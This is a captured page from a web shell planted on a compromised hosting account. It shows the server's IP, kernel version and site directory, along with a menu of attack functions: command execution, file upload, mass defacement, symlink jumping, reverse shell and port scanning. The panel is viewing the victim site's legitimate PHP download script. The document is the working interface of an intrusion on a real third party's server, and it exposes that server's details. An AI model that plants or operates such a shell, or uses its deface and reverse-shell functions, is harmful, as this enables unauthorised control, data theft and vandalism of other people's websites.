Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
public_html
/
ecomercial
/
Viewing: portal-download.php
<?php require_once __DIR__ . '/app/portal_helpers.php'; $slug = trim((string) ($_GET['slug'] ?? '')); $token = trim((string) ($_GET['token'] ?? '')); $contentId = (int) ($_GET['content'] ?? 0); try { $pdo = db(true); $client = portal_client_by_access($pdo, $slug, $token); } catch (Throwable $exception) { http_response_code(500); exit('No se pudo validar el acceso.'); } if (!$client || $contentId <= 0) { http_response_code(404); exit('Contenido no disponible.'); } $content = portal_content_for_download($pdo, $client, $contentId); if (!$content || empty($content['media_url'])) { http_response_code(403); exit('Descarga no habilitada.'); } $mediaUrl = trim((string) $content['media_url']); if (preg_match('#^https?://#', $mediaUrl)) { redirect($mediaUrl); } $localPath = parse_url($mediaUrl, PHP_URL_PATH) ?: $mediaUrl; $localPath = rawurldecode(str_replace('\\', '/', $localPath)); $root = realpath(__DIR__); $path = realpath(__DIR__ . '/' . ltrim($localPath, '/')); if (!$root || !$path || !str_starts_with($path, $root) || !is_file($path)) { http_response_code(404); exit('Archivo no encontrado.'); } $filename = basename($path); $mime = function_exists('mime_content_type') ? (mime_content_type($path) ?: 'application/octet-stream') : 'application/octet-stream'; while (ob_get_level()) { ob_end_clean(); } header('Content-Type: ' . $mime); header('Content-Length: ' . filesize($path)); header('Content-Disposition: attachment; filename="' . str_replace('"', '', $filename) . '"'); header('X-Content-Type-Options: nosniff'); readfile($path); exit;
Coded With 💗 by
0x6ick